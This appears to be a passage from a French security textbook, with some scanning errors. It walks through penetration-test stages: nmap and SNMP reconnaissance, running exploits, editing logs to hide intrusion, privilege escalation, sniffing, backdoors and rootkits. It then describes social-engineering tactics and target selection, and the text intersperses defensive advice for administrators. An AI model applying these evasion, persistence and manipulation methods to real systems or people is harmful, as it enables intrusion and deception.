prise d'empreinte TCP/IP sur les réseaux complets avec une adresse de 
sous-réseau et son masque. Il permet de trouver par exemple le système 
d'exploitation en analysant la réponse donnée d'abord à la connexion TCP 
à un port ouvert, puis à un port fermé. Cette technique n'est pas fiable à 
100% mais reste très efficace. 


Il existe d'autres types de scanneurs de ports, les mappeurs passifs, comme 
le logiciel Siphon. Ils permettent de déterminer la topologie réseau du brin 
physique sur lequel est connectée la machine depuis laquelle l'exécutable 
est lancé, mais ils sont surtout utilisés car indétectables par les machines 
cibles, puisqu'ils n'envoient pas de paquets. 

Enfin, il existe des outils permettant de capturer des connexions X (serveur 
d'affichage sur les ordinateurs tournant sous Unix/Linux), et de capturer 
ainsi les écrans des machines cibles, la frappe utilisateur et de voir les fenê- 
tres de la victime en temps réel, ce qui représente un avantage puissant. 


Dans la pratique, pour découvrir par exemple la topologie d'un réseau 
192.168.0.0/24, dont l'adresse réseau est 192.168.0 et pouvant contenir jus- 
qu'à 254 machines, nous utiliserons la commande : 


Ī # nmap -sS -sU -O -oN nmap.log 192.168.0.1-254 
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On peut obtenir par exemple ce genre de sortie : 


Starting Nmap 4.76 ( http://nmap.org ) at 2009-05-13 00:10 CEST 
Interesting ports on 192.168.0.11: 
Not shown: 1995 closed ports 


PORT STATE SERVICE 
22/tcp open ssh 
80/tcp open http 
111/tcp open rpchind 


68/udp open| filtered dhcpc 
111/udp openlfiltered rpcbind 
5353/udp open|filtered zeroconf 
Device type: general purpose 
Running: Linux 2.6.X 

OS ‘détails: Linux 2:6,17 -.2.6,25 
Network Distance: 0 hops 


Voilà le résultat de scan d'une seule machine. Ici nous avons fourni plu- 
sieurs options à nmap, à savoir : 


sS = précise que l'on veut faire un SYN scan 


sU = scanne également les ports UDP 
O = tente ainsi d'identifier le système d'exploitation des machines 
scannées 


oN nmaplog = demande à nmap d'enregistrer la sortie dans un fichier 
nmap.log précisé. 


Enfin, on demande à nmap de scanner toutes les machines du réseau 


192.168.0. 


Ensuite, nous allons pouvoir lire le journal de sortie nmap.log, récupérer les 
adresses IP et les ports ouverts associés, pour en déduire le type de service 


ouvert présumé. 
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Interroger les services lancés 


Nous allons interroger chaque service susceptible de nous offrir des infor- 
mations intéressantes afin d'en connaître davantage, avec les informations 
de bannière par exemple. 


Typiquement, nous allons nous arrêter sur quelques services intéressants 
comme les serveurs DNS (port 53), les serveurs NFS (2049), les serveurs 
NetBIOS (139), les serveurs mail (25) et les serveurs SNMP (ports UDP 
161, 162). Ces services sont susceptibles de nous apporter des informations 
intéressantes et des comptes utilisateurs valides qui vont nous permettre 
de passer à l'étape suivante de l'attaque. 


Obtenir des informations sur un service est généralement assez facile. Par 
exemple, essayons de voir quel serveur web tourne derrière un site web : 


$ telnet www.example.com 80 
Trying 208.77.188.166... 
Connected to www.example.com. 
Escape character is '^]'!. 

GET / HTTP/1.0 

HRPP k 200: OK 


HTTP/1.1 400 Bad Request 

Date: Fri, 12 Jun 2009 21:01:19 GMT 

Server: Apache/2.2,3 (CentOS) 
Content-Length: 387 

Connection: close 

Content-Type: text/html; charset=iso-8859-1 


Avec cette simple commande, nous connaissons le serveur web (Apache), 
sa version (2.2.3), le système d'exploitation (CentOS), et l'heure du ser- 
veur | 


L'empreinte de pile permet donc d'identifier un système d'exploitation de 
manière relativement sûre. 
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Côté protection, il est indispensable de cacher le maximum d'informations 
au public, dans la configuration des services ou du système. Par exemple, 
désactiver l'affichage de bannière de votre serveur web (Apache par 
exemple) permettra d'éviter de diffuser au grand jour la version utilisée 
pour n'importe qui contacterait le système sur le port 80 (via un navigateur 
web, ou un telnet). 


Bien sûr, cacher cette information n'est pas une solution suffisante pour 
dissimuler le système d'exploitation qui tourne sur un système, mais ce 
n'est pas une raison pour divulguer cette information à tout un chacun. 


Malheureusement certaines applications resteront bavardes si on les 
contacte et fourniront des informations utiles pour l'attaquant. Par 
exemple, si on lance un telnet sur un serveur FTP, selon le service utilisé, il 
pourra nous renseigner sur son identité (PureFTPd, vsftpd...), sa version, 
l'heure locale du serveur, si le serveur accepte les connexions anonymes ou 
non... Ensuite, la commande SYST peut nous donner des informations 
supplémentaires, et si le FIP anonyme est autorisé, il est généralement 
possible de récupérer le binaire /bin/ls permettant alors de connaître 
l'architecture du serveur. 


Un service bavard permettant d'obtenir des informations détaillées est celui 
du snmp, accessible généralement sur le port 161 en udp. 


Ce service dans ses premières versions est une source d'informations 
bavarde, or il reste très souvent utilisé tel quel, avec une configuration par 
défaut, et ainsi, grâce à la commande snmpwalk nous pouvons obtenir de 
nombreuses informations, en utilisant la communauté public’. 


Ce service est accessible généralement sur les routeurs et autres matériels 
réseau, mais aussi sur les serveurs. 


L'architecture du protocole SNMP se compose d'agents, que sont les 
switches, les routeurs, quelques serveurs, qui possèdent une base de don- 
nées appelée la MIB (Management Information Base). Ces agents surveillent 
le réseau et envoient un trap, un datagramme, pour prévenir chaque événe- 
ment inhabituel provenant du réseau. Ces traps sont envoyés à des moni- 
teurs qui effectuent aussi bien de la surveillance passive qu'active, et per- 
mettent à l'administrateur de gérer son réseau. 
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Les informations des agents, organisés en communautés, sont consultables 
à n'importe quel moment via le protocole SNMP. La communauté 'public' 
par exemple permet d'accéder aux informations basiques et accessibles à 
tous. Les autres informations plus sensibles sont accessibles par d'autres 
communautés ('private' par exemple). Chaque communauté possède des 
droits différents en lecture et écriture. 


Le problème est d'une part, que la communauté ‘public, même si elle n'est 
pas censée contenir d'informations sensibles, si elle est mal configurée (et 
c'est assez souvent le cas), est accessible depuis n'importe quelle machine, 
et permet d'accéder à des informations toujours utiles pour un attaquant. 


D'autre part, il suffit d'identifier le nom de la communauté qui possède les 
droits en écriture pour modifier certaines informations réseau ! 


Nous pouvons donc repérer grâce à un scanneur de ports comme nmap, 
quels sont les agents et quel est le moniteur. Les ports habituels pour le 
SNMP sont le 161 (udp) pour l'écoute des requêtes par les agents, et le port 
162 (udp) pour l'écoute des traps par le moniteur. 


Ainsi, si l'on souhaite découvrir les équipements SNMP d'un réseau 
192.168.0.0/16, il nous suffit de lancer nmap : 


Ī $ nmap -sU -p 161,162 192.168.0.0/24 


Pour trouver le nom de la communauté accessible, il existe des outils qui 
agissent en testant une grande quantité de noms automatiquement en 
essayant toutes les combinaisons possibles, qui regardent quand une com- 
munauté est trouvée, si elle est accessible en écriture ou non. Il est égale- 
ment possible de fournir à l'outil des noms de communauté probables. 


Ensuite, il suffit de suivre les méthodes d'accès et de modifications habi- 
tuelles du protocole SNMP, disponibles facilement sur Internet, pour accé- 
der à des informations et écrire des informations, et dans ce cas la prise de 
contrôle est forte ; il est possible par exemple de débrancher une partie du 
réseau, et de modifier d'une manière plus générale toutes les données de la 
MIB. 
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3.1 Consulter les failles recensées 


Une fois que nous possédons suffisamment d'informations intéressantes 
sur un système d'information (nous complèterons nos recherches au fur et 
à mesure de notre avancée, en fonction de ce que nous allons découvrir), 
nous allons essayer de repérer une faille par laquelle s'insérer dans le 
système. 


Une faille correspond à une vulnérabilité nuisible à la sécurité du système. 
Elle peut se situer dans le système d'exploitation lui-même, dans une appli- 
cation, un service, un protocole, ou tout simplement dans une erreur 
humaine. 


Le but est donc de trouver la faille qui va nous permettre de nous immiscer 
dans le système, et de l'exploiter à cette fin. 


Une fois que nous avons récupéré un maximum d'informations sur l'archi- 
tecture du réseau, et que nous avons terminé la collecte des informations 
disponibles (chaque information a son importance), nous avons une vision 
globale de la façon dont le réseau fonctionne. En fonction des informations 
en notre possession, nous pouvons établir a priori l'inventaire du parc logi- 
ciel ou matériel du réseau, ou nous connaissons assez d'informations sur 
une machine par laquelle nous allons tenter de nous insérer dans le réseau. 


Il existe des scanneurs de vulnérabilités, comme Nessus ou SAINT, aux- 
quels on peut soumettre un réseau pour un test d'intrusion. Le logiciel en 
ressort alors les failles connues. 


En revanche, la discrétion n'est pas vraiment le fort de ces logiciels, puis- 
qu'ils vont tester les failles connues en masse. Il est donc préférable d'inter- 
roger plutôt les bases de données en ligne telles que sur le site SecurityFo- 
cus qui met à jour régulièrement sa base de données de vulnérabilités. 


Grâce à la prise d'empreinte réalisée précédemment, nous connaissons les 
services actifs sur la machine cible, et probablement la version de ceux-ci, 
ainsi que le système d'exploitation présumé utilisé. 
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Chaque vulnérabilité possède sa propre technique d'exploitation. Mais il 
existe des bibliothèques "d'exploits", qu'il faut remettre à jour en perma- 
nence, dès lors qu'une nouvelle vulnérabilité a été découverte. 


Le but ici est de trouver un "exploit", c'est-à-dire un programme permettant 
de tester la vulnérabilité du service touché. Il est possible de rechercher ce 
genre de programmes sur des sites spécialisés. Il suffit de trouver une vul- 
nérabilité qui touche un service accessible depuis le réseau extérieur pour 
tester l'exploit. 


Il est également possible de découvrir des vulnérabilités non divulguées en 
interrogeant directement les bonnes personnes, sur les channels IRC par 
exemple. 


Éliminer les failles non fondées 


Ensuite, il convient d'éliminer les failles non fondées, c'est-à-dire les failles 
concernant les services qui ne sont en réalité pas utilisés sur la machine 
cible, ou dans une autre version non atteinte. Le but étant de ne pas avoir 
une trop longue liste d'exploits à tester, afin de rester le plus discret pos- 
sible. Seuls les exploits touchant des failles exploitables doivent être testés. 


Une fois l'exploit trouvé, nous allons compiler le programme et l'exécuter 
contre la machine cible. Si nous obtenons un shell root, alors la machine 
est vulnérable à cette faille, ce qui en fait une porte d'entrée directe. Sinon, 
il faudra trouver une autre porte d'entrée. 


Une porte d'entrée assez fréquente sur les systèmes concerne les failles 
Web. En effet, de nombreux sites présentent des problèmes de sécurité, que 
ce soit dans les formulaires, particulièrement les formulaires d'envoi qui 
sont mal protégés et permettent d'envoyer des fichiers sur le serveur. Là 
aussi, les vulnérabilités des scripts utilisés pour les sites web ou les forums 
sont recensés sur des sites spécialisés, et constituent généralement une 
bonne porte d'entrée sur un système. 
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On remarque ici quelques règles de bonne conduite à observer chez un 

administrateur soucieux de la sécurité de son système. 

- Il est indispensable de couper les services inutilisés sur les sytèmes, et de 
ne pas utiliser de logiciels inutiles ou inconnus. 

- Les accès clients doivent être sûrs pour ne pas compromettre le serveur 
du réseau. 

- Il faut également accorder de l'importance à la mise à jour des logiciels, 
des sytèmes d'exploitation, des firmwares des équipements. 

- Chaque poste doit être protégé pour protéger le système d'informations 
complet, avec antivirus ou encore pare-feu mis à jour. 

- Un administrateur doit connaître les vulnérabilités concernant son sys- 
tème, contrôler chaque sortie et entrée du réseau, et journaliser le tout. 

- Enfin, les comportements suspects doivent être vus immédiatement, et 
offrir un maximum d'informations. 


Intrusion dans le système 


Ne pas laisser de traces 


Une fois que nous avons trouvé une porte d'entrée dans l'ordinateur cible, 
nous allons d'abord faire attention à nous protéger, pour ne pas être décou- 
vert par l'administrateur du système. 


Il ne faut pas laisser de traces et il faut s'assurer une bonne place sur le sys- 
tème. 


Un administrateur sérieux surveille les journaux système, possède des sta- 
tistiques d'utilisation du système, et des outils de protection. Il est donc 
essentiel de ne pas apparaître comme une activité anormale. 
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À tout moment, un administrateur peut vérifier si un intrus s'est infiltré de 
différentes façons : 

- Vérification des fichiers de journaux système. 

- Analyse des fichiers espions (sniffers) installés par l'intrus. 

- Utilisation de programmes d'audit comme loginlog. 

- Vérification des connexions en cours avec la commande netstat. 


D'une part il est préférable d'utiliser un serveur tampon entre la machine 
de connexion et le serveur cible. D'autre part, chaque fichier de journalisa- 
tion doit être modifié pour effacer les traces. Nous pouvons aussi renom- 
mer les programmes connus pour éviter que le nom réel apparaisse dans la 
liste des processus en cours d'exécution. Une bonne habitude à prendre aus- 
si est de ne pas entrer les paramètres des commandes directement dans la 
liste de commande (sinon ils apparaîtront dans la liste des processus), mais 
plutôt comme des commandes internes en lançant d'abord le programme 
sans option. 


Généralement les fichiers journaux sont dans /var/log. Il ne faut surtout 
pas les effacer puisque l'administrateur remarquera aussi qu'une intrusion a 
eu lieu. Il est préférable de les modifier pour enlever les traces. Plusieurs 
logiciels permettent cela, comme cloak2.c 


Extension des privilèges 


Si l'accès au système s'est fait directement via un accès root, bien sûr la 
question ne se pose pas, mais si l'accès est un accès utilisateur, nous allons 
devoir continuer notre quête du mot de passe root ou d'un autre utilisateur 
permettant d'avoir plus d'informations. 


Ici, on peut noter à quel point il est important pour les utilisateurs du sys- 
tème de ne posséder que les droits nécessaires à l'accomplissement de leurs 
tâches, que ce soit des utilisateurs humains ou des services système. 


Bien sûr, si un attaquant arrive directement avec les droits root sur le sys- 
tème, il a le pouvoir d'un super administrateur et il peut tout faire. Cepen- 


dant, s'il a réussi à intégrer le réseau grâce à un accès utilisateur, le fait 
d'avoir des droits limités peut ralentir également le processus. 
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De plus, il est essentiel en entreprise d'établir une politique du mot de 
passe pour chaque utilisateur. Par défaut, les utilisateurs sont assez laxistes 
en ce qui concerne leur mot de passe. Ils ne se rendent pas compte à quel 
point ils peuvent compromettre la sécurité du système. 


Même si l'on sait que l'ensemble des mesures de précaution ne sert pas à 
grand-chose 99% du temps, elle peut sauver la sécurité des données d'une 
entreprise en cas d'attaque. 


S'il est très facile de collecter des informations sur une victime potentielle, 
il est également facile et dans la capacité de tout un chacun d'empêcher la 
fuite des informations, mais c'est un travail à réaliser par l'ensemble de 
l'équipe, chaque employé doit être impliqué. Or le facteur humain est sou- 
vent la cause de la défaillance d'un système pourtant sécurisé, qui rend 
alors inutile les moyens déployés. 


Reprise de la collecte d'informations 


Une fois que nous avons pénétré le système, nous allons pouvoir continuer 
notre collecte d'informations. 


Nous souhaitons avoir accès à des comptes utilisateurs valides, pour cela, 
plusieurs méthodes peuvent nous aiguiller. Nous pouvons par exemple 
consulter les annuaires de l'entreprise, la messagerie ou les partages de 
fichiers. 


Nous pouvons également nous appuyer sur les vulnérabilités des comman- 
des R* de Berkeley, comme rsh, rlogin ou rcp... Ce sont des commandes 
BSD qui sont très peu sécurisées, et qui ont été remplacées par SSH, mais 
encore utilisées sur des serveurs Unix. 


Enfin en dernier recours, nous pouvons nous attaquer aux mots de passe 
par "brute force", en essayant en boucle des combinaisons plus ou moins 
compliquées de mots de passe, mais cela est très long et facilement 
détectable. 


Le service finger des systèmes Unix permet également d'avoir un accès à 
des comptes valides du système. 
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Notre but est d'élargir notre accès, d'étendre nos privilèges. Le but est d'être 
root, super utilisateur, si ce n'est pas encore le cas. 


Ainsi, la compromission de la machine sera possible, nous serons en mesure 
de modifier les fichiers système, et aurons accès à toutes les informations 
de la machine. 


Une fois que nous sommes super utilisateur, nous avons également la pos- 
sibilité de sniffer le trafic : cela consiste à écouter le trafic réseau en prove- 
nance et à destination des machines du même brin, pour récupérer des cou- 
ples identifiant/mot de passe permettant d'accéder à des privilèges plus 
élevés, et de contrôler une plus grande partie du réseau. 


Assurer son accès 


Exploiter les relations des machines 


Une fois que nous avons un accès sur une machine du réseau, nous possé- 
dons un bon nombre d'informations sur notre cible. 


Nous allons maintenant exploiter les relations d'approbation existantes 
entre les différentes machines du réseau afin d'élargir nos privilèges et 
étendre notre pouvoir d'action. 


Une fois présent dans le réseau, nous possédons des informations supplé- 
mentaires sur l'architecture de celui-ci. Avec un peu d'observation, il va 
nous falloir repérer les différents serveurs : où sont les fichiers, les sauvegar- 
des, les journaux système, les bases de données utilisateurs... 


ERemoarque 
Le serveur NIS est une cible fréquente parce qu'il regorge d'informations sur les 
utilisateurs. 


Pour cela, une fois introduit dans le réseau, la commande domainname 
nous permet d'obtenir le nom du domaine NIS, s'il existe. 


De même, les machines possédant un accès root sont potentiellement des 
machines d'administrateurs et donc des machines cibles. 
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Écouter le trafic 


Disposant d'un accès root sur une machine, nous pouvons sniffer les infor- 
mations qui circulent sur le réseau et accroître les privilèges en ayant accès 
par exemple au compte root d'un autre administrateur. 


Pour sniffer un réseau, il existe de nombreux outils, le plus connu étant 
Wireshark (anciennement Ethereal), mais d'autres sont également plus spé- 
cifiques, comme Siphon, ou DSniff. Ce dernier capture les mots de passe, 
mais reconnaît de nombreux protocoles, comme snmp, NetBIOS ou Rlogin. 


Pour étudier le trafic d'un réseau, un sniffer est un outil indispensable. La 
grande majorité des protocoles Internet font transiter les informations en 
clair sur le réseau. Ainsi, en analysant le trafic, il nous est très facile de voir 
les informations de manière non chiffrée, et de pouvoir les exploiter immé- 
diatement. Par exemple, si un utilisateur est en train de consulter ses 
e-mails sur le réseau sans utiliser de chiffrage SSL, ou s'il renseigne sur un 
site Internet un mot de passe sans protocole HTTPS, alors ses identifiants 
et mots de passe vont transiter sur le réseau et pourront être interceptés 
directement avec le sniffer. 


Faciliter son retour 


Ensuite, nous allons nous assurer d'avoir un accès quasi permanent à la 
machine dans laquelle nous avons réussi à nous insérer. 


Pour cela, nous pouvons installer une backdoor sur la machine, c'est-à-dire 
une porte dérobée. Cela aura pour but de pouvoir entrer dans la machine 
même si tous les mots de passe ont été changés par l'administrateur. Nous 
allons également nous en servir pour limiter les traces laissées sur le sys- 
tème lors de l'intrusion, en offrant une identification transparente sur la 
machine. 


Enfin, cela doit nous permettre de gagner du temps lorsque nous voudrons 
revenir sur le système. 


Cette porte dérobée va s'exécuter sur le système sans que le propriétaire du 
système ne s'en aperçoive. 
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Nous pouvons également installer des rootkits. Ce sont des outils qui rem- 
placent les outils d'administration du système par des versions modifiées 
qui fonctionnent de la même manière en apparence mais qui masquent des 
actions en tâche de fond. Par exemple, un tel outil va masquer la présence 
d'un hacker sur le système, pour ne pas montrer les services lancés ou 
l'historique de ses commandes. 


Les rootkits masquent la réalité à l'administrateur, c'est pourquoi celui-ci 
doit être capable de se mettre dans la peau d'un attaquant pour être cons- 
cient de cela. Il doit être capable de voir les failles de son système dans un 
contexte équivalent. 


Exploitation 


L'attaque d'un système peut avoir plusieurs fins. Quoi qu'il en soit, généra- 
lement un attaquant pénétrant un système va se garder une porte ouverte 
pour revenir sur le système par la suite. 


Un attaquant va également effacer ses traces pour éviter de laisser des 
soupçons à l'administrateur du réseau compromis. 


La dernière étape de l'audit ou de l'intrusion est le nettoyage. Tous les 
fichiers qui ont été créés ou modifiés pour l'intrusion doivent être remis au 
propre pour effacer les traces. 


Lorsque le test d'intrusion que nous venons de voir se fait dans le cadre de 
la loi, c'est-à-dire qu'il s'agit d'une intrusion en local ou faite par un orga- 
nisme spécialisé à la demande de l'entreprise, il n'y a pas d'exploitation. La 
fin de l'audit consiste à informer les responsables du réseau des failles de 
leur système s'il y en a, et de proposer des solutions sécurisées pour 


combler ces failles. 


Lors d'un audit d'intrusion tel que celui que nous avons réalisé, nous 
devons alors classer les failles dans un ordre de gravité, pour traiter en 
urgence les failles les plus graves. Par ailleurs, certaines failles n'ouvrent pas 
des portes très sensibles. 
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L'audit capturant l'état du système au moment du test, il constitue pour 
l'entreprise un point de départ pour une politique de sécurité à mettre en 
place dans le temps. 


Nous avons vu ensemble le principe d'intrusion dans un système. Nous 
allons maintenant pouvoir approcher de plus près les failles les plus couran- 
tes et les moyens techniques mis en œuvre lors d'une intrusion. 
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1. Concept 


1.1 Généralités 


Le social engineering, ou en français la manipulation sociale, est une tech- 
nique largement utilisée depuis très longtemps pour contourner des protec- 
tions : il s'agit de pousser une personne à faire certaines choses ou révéler 
des informations sans les lui demander directement, d'où le terme de mani- 
pulation. Nous allons voir qu'en exploitant un contexte ou la personnalité 
d'une victime, nous pouvons récupérer diverses informations, suivant le 
niveau de coopération de cette personne. 


En fait, le social engineering est une technique très ancienne. Dans la Bible, 
Jacob se déguise pour tromper son père et obtenir une bénédiction. Les télé- 
graphistes déjà écoutaient les conversations pour pouvoir utiliser les détails 
intéressants qu'ils pouvaient en extraire, comme les informations bancaires 
de clients fortunés ou des protocoles d'échanges entre les diligences. Plus 
proche de nous, nous pouvons observer tout l'art de la manipulation dans 
le film « Arrête-moi si tu peux » de Steven Spielberg, racontant efficace- 
ment l'histoire réelle de Franck Abagnale, célèbre arnaqueur. Ces trois cas 
montrent que la manipulation sociale n'est pas uniquement liée à la 
sécurité des systèmes d'information. 
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Pour ce qui est de la sécurité informatique, on compte quelques experts en 
social engineering. Le plus connu est certainement Kevin Mitnick, dont le 
livre « L'art de la supercherie » co-écrit avec William L. Simon constitue une 
référence dans le domaine. Kevin Mitcnick a été reconnu coupable d'avoir 
détourné de nombreux systèmes aux États-Unis et a purgé une peine de 
prison à ce titre. En cherchant sur Internet, le pseudonyme de Bernz 
devrait également vous donner accès à quelques documents très bien rédi- 
gés et tout autant appréciés, cherchez par exemple "Bernz Social Enginee- 
ring" sur Google. Enfin, l'histoire des frères Badir mérite toute notre atten- 
tion : tous trois non-voyants de naissance, ils se sont donnés pour mission 
de démontrer aux voyants que leur problème de vue ne les empêchait pas 
de procéder à des détournements informatiques, mission réussie avec brio 
puisqu'elle les a menés jusqu'aux ordinateurs du Tsahal en utilisant à de 
nombreuses reprises « le social » comme on appelle la manipulation sociale 
dans les rencontres. 


Par téléphone, par e-mail, par fax ou par courrier, le social engineering 
s'exerce grâce à tous les médias. Dans un entretien avec Jonathan Littman, 
Kevin Mitnick affirme que 85% de ses détournements ont été réalisés sans 
ordinateur. Nous allons voir comment et pourquoi le social engineering est 
toujours autant d'actualité. 


L'être humain : la pièce fragile 


Pour la suite de ces pages, nous considérerons uniquement l'aspect lié à la 
sécurité informatique du social engineering. Il faut pourtant savoir que les 
informations présentées ici sont les mêmes pour les autres utilités de la 
manipulation sociale. Il faut pourtant savoir que ces méthodes sont aussi 
utilisées par des enquêteurs de tous les domaines, par les enfants curieux et 
par bien d'autres personnes très éloignées de l'informatique. 
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De tout temps, on a fait confiance à l'être humain pour conserver des 
informations. Confiance plus ou moins exprimée : César envoyait ses mes- 
sages de manière chiffrée (grâce au très célèbre algorithme dit "de César") 
mais partait du principe que seul le destinataire connaissait « la clé de 
déchiffrement ». Le problème avec l'être humain, c'est qu'il existe des tas de 
raisons de divulguer ses secrets, allant de la simple inattention à l'obliga- 
tion sous la torture, deux extrêmes qui ont poussé les destinataires de 
César à révéler leur clé et les messagers à partager leur fardeau. 


Ramy Badir, l'un des frères non-voyants, déclara un jour « qu'un ordinateur 
sécurisé est un ordinateur entreposé dans un hangar et débranché ». Parmi 
les réponses à cette citation, l'une d'entre elles a retenu notre attention : 
son auteur, Kevin Mitnick, indique qu'il pourra toujours trouver une per- 
sonne assez aimable pour brancher l'ordinateur | 


Le social engineering, c'est donc ça : utiliser la pièce fragile qu'est l'humain 
pour avancer dans l'histoire, en lui demandant de rebrancher un ordinateur, 
de transmettre une fausse information, d'indiquer le mot de passe du 
Directeur général, voire même d'envoyer par courrier le plan confidentiel 
sur lequel ont travaillé les ingénieurs de l'entreprise durant plus de six 
mois. Rien ne sert d'avoir des protections techniques infaillibles si une per- 
sonne interne à votre système permet à son insu à un attaquant de déjouer 
toutes ces protections. L'humain est une faille qu'il faut surveiller. 


Les ingrédients 


La motivation 


L'utilisation du social engineering se justifie dans tous les domaines par une 
motivation. Dans le domaine informatique, c'est souvent l'argent ou le 
bénéfice qui motivent les actes des assaillants. La manipulation est l'outil 
qui permet d'obtenir des informations, comme un mot de passe ou un 
numéro de téléphone. 
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Dans certains cas, le social engineering permet de terminer « la mission » : 
dans le cas d'une attaque contre une société visant à récupérer les informa- 
tions comptables d'une entreprise, une conversation téléphonique avec le 
service financier pourrait permettre d'obtenir toutes les indications recher- 
chées ; un autre chemin serait de récupérer un mot de passe utilisateur et 
d'utiliser une technique de pénétration autre (par le réseau, par un virus) 
pour obtenir ce qui est recherché. 


Bien que la plupart des informations de ce chapitre concernent les entrepri- 
ses, les particuliers sont aussi la cible régulière de la manipulation. Les 
parents subissent les assauts de leurs enfants qui désirent connaître le code 
parental de la connexion Internet ; les camarades de classe tentent de déro- 
ber des informations utiles pour accéder à la messagerie instantanée d'au- 
tres enfants, pour la plaisanterie, pour les espionner ou même pour revendi- 
quer un statut de hacker malgré leur jeune âge. 


Enfin, il faut aussi prendre en compte le grand nombre de hackers qui agis- 
sent simplement par curiosité. Mais l'argent et la célébrité ne sont pas tout, 
il ne faut pas négliger le grand nombre de personnes qui tenteront de mani- 
puler une entreprise juste pour le plaisir ou la curiosité. Le social enginee- 
ring est une technique relativement simple et aux coûts très limités, et 
attire bon nombre de personnes à la recherche de sensations, mais qui ne 
veulent pas, a priori causer de tort ; seulement il arrive parfois que face à la 
simplicité des choses, la personne la moins mal intentionnée se laisse tenter 
par l'appât du gain, c'est pourquoi, il convient également de se protéger de 
ces curieux. Il arrive cependant que les desseins changent en cours d'activi- 
té, la réalité sur la facilité d'accès aux informations sensibles faisant parfois 
naître des vocations. 


Le profil de l'attaquant 


Le social engineering, ce sont des appels téléphoniques, des discussions où il 
faut manipuler l'avis des personnes, en jouant sur le ressenti de celles-ci et 
en faisant tomber une à une toutes les formes de résistance. L'assaillant 
doit donc posséder quelques atouts, au premier rang desquels se trouve le 
charisme : il doit savoir s'exprimer et jouer sur les intonations. Une petite 


part d'acteur sommeille en tout attaquant qui utilise la manipulation. 
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Pour convaincre, il faut aussi au manipulateur beaucoup d'audace, pour 
faire évoluer la discussion dans le sens voulu en guidant la victime même 
dans les directions les plus improbables. L'assaillant est donc un véritable 
imposteur, qui saurait très certainement nous vendre un verre de n'importe 
quelle eau plate en nous vantant ses mérites curatifs. 


Mais pour inspirer la confiance, savoir parler n'est pas tout. Pour être bien 
à l'aise dans une attaque de social engineering, l'attaquant devra avoir une 
bonne culture de l'entreprise visée, de son jargon technique, de ses pro- 
duits : s'il s'agit de se faire passer pour un client ou même un membre de 
l'entreprise, il est important de connaître les produits et services de l'entre- 
prise, mais d'avoir également quelques informations sur son fonctionne- 
ment interne. C'est pourquoi le manipulateur doit être doué d'une grande 
curiosité et d'une grande patience, puisqu'il lui faudra parfois plusieurs 
jours, voire plusieurs semaines pour obtenir toutes les informations dont il 
a besoin. 


C'est aussi un fin limier. Véritable Columbo, le manipulateur social notera 
chaque détail, même si l'utilité de celui-ci n'est pas évidente. Le cerveau 
humain est ainsi fait que les plus petits détails lui parviennent directement, 
et quand ceux-ci sont familiers, ils créent un sentiment de sécurité chez la 
personne qui les entend. Ces détails sont bien souvent des noms de person- 
nes, des mots de jargon, des références à des situations passées. L'attaquant 
cherchera donc des informations qu'il pourra placer dans des discussions 
futures pour annihiler tout sentiment défensif chez la victime. D'autre 
part, ces détails sont aussi des informations sur le fonctionnement de 
l'entreprise qui permettront à l'assaillant de mieux appréhender sa cible. 


Le social engineer est donc quelqu'un de très minutieux, cherchant autant 
d'informations que nécessaire, capable de jouer avec les impressions qu'il 
produit. Pourtant, toutes ces aptitudes sont souvent des acquis et non des 
dons et le social engineering attire donc aussi par son côté abordable. 
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2.3 Le profil de la cible 


Le choix de la victime est l'une des étapes les plus importantes de l'attaque. 
Quand il pourra la choisir, le manipulateur optera pour une très grosse 
société, avec un service informatique décentralisé tel que les techniciens du 
support n'ont pas une voix ou un visage connus des employés. Bien sûr, les 
entreprises répondant à ce critère sont en nombre limité, et même celles 
qui y répondent ont bien souvent une partie décentralisée représentée par 
un responsable informatique du site. 


L'attaquant doit ensuite choisir dans l'entreprise la personne qu'il appellera. 
Habituellement, c'est au standard qu'on s'adresse en premier lieu, puisque 
c'est bien souvent le seul numéro de la société qui soit disponible publique- 
ment. Les cas sont ensuite multiples, puisque l'on peut très bien trouver 
toutes les informations à partir du standard. Beaucoup de textes relatifs à 
la manipulation font état de cette porte d'entrée. Certains d'entre eux 
avancent l'hypothèse que les attaquants visent volontairement ce poste de 
l'entreprise parce qu'ils sont pratiquement sûrs d'y trouver une femme, 
dont on croit souvent que les sentiments et les réactions sont plus 
facilement manipulables. 


En réalité, le poste d'hôtesse d'accueil est une pierre angulaire de l'entre- 
prise, puisque ce poste reçoit tous les appels venus de l'extérieur, qu'il a 
accès intégral à l'annuaire de l'entreprise, qu'il a parfois accès aux agendas 
et aux informations de l'entreprise et... que les personnes à qui sont 
confiées toutes ses responsabilités sont régulièrement oubliées lors des réu- 
nions concernant la sécurité du système d'information. 


Pourtant, il sera parfois nécessaire de contacter une autre personne, notam- 
ment si la demande est très précise : le standard a rarement accès aux 
comptes de l'entreprise ou aux plans techniques. Il faudra donc parfois 
ruser pour pouvoir joindre directement les personnes concernées, avant de 
détourner leur attention pour obtenir les informations. 
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Dans la plupart des cas, le manipulateur tâchera d'avoir affaire à un service 
informatisé mais pas au service informatique lui-même, qui est probable- 
ment le plus informé sur les problématiques de sécurité. Mais comme nous 
l'avons vu précédemment, il ne faut pas négliger la part d'audace de l'atta- 
quant, qui n'hésitera pas à appeler le grand patron pour lui demander des 
informations. 


Reste ensuite à progresser, comme dans le cas d'une escalade de privilèges 
standard. Un appel peut offrir au manipulateur assez d'informations pour 
procéder à l'appel suivant, qui amènera également son lot d'informations 
permettant de passer à une méthode d'attaque technique (attaque du site 
Internet par exemple) ou de passer un autre appel téléphonique. 


Anatomie d'une attaque 


Les moyens utilisés 


Quand on aborde le social engineering, il convient de différencier les mé- 
dias et les méthodes. Les premiers sont le moyen de communication, le 
vecteur que va utiliser l'assaillant pour mener son attaque (ou les vecteurs, 
dans le cas d'une attaque complexe). Les méthodes sont les leviers psycho- 
logiques que nous détaillerons dans les prochaines pages. 


La grande majorité des tentatives se fait par téléphone : la simplicité et le 
quasi anonymat que confère le téléphone sont des atouts non négligeables 
pour l'attaquant. En effet, il est possible chez de très nombreux opérateurs 
téléphoniques de ne pas divulguer son numéro d'appelant, ce qui empêche 
la cible de reconnaître un numéro. 


Anonymat également puisqu'aujourd'hui, de nombreuses offres « sans 
abonnement » sont disponibles, pour seulement quelques euros chez tous 
les marchands de journaux ; pendant une durée d'une dizaine de jours, il 
est possible d'utiliser le téléphone sans avoir à déclarer son identité à l'opé- 
rateur de télécommunications, ce qui laisse de grandes portes ouvertes aux 
tests. 
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Simplicité du téléphone enfin puisqu'un appel se passe rapidement, et que 
l'attaquant n'est pas confronté physiquement à sa cible : il n'a qu'à surveil- 
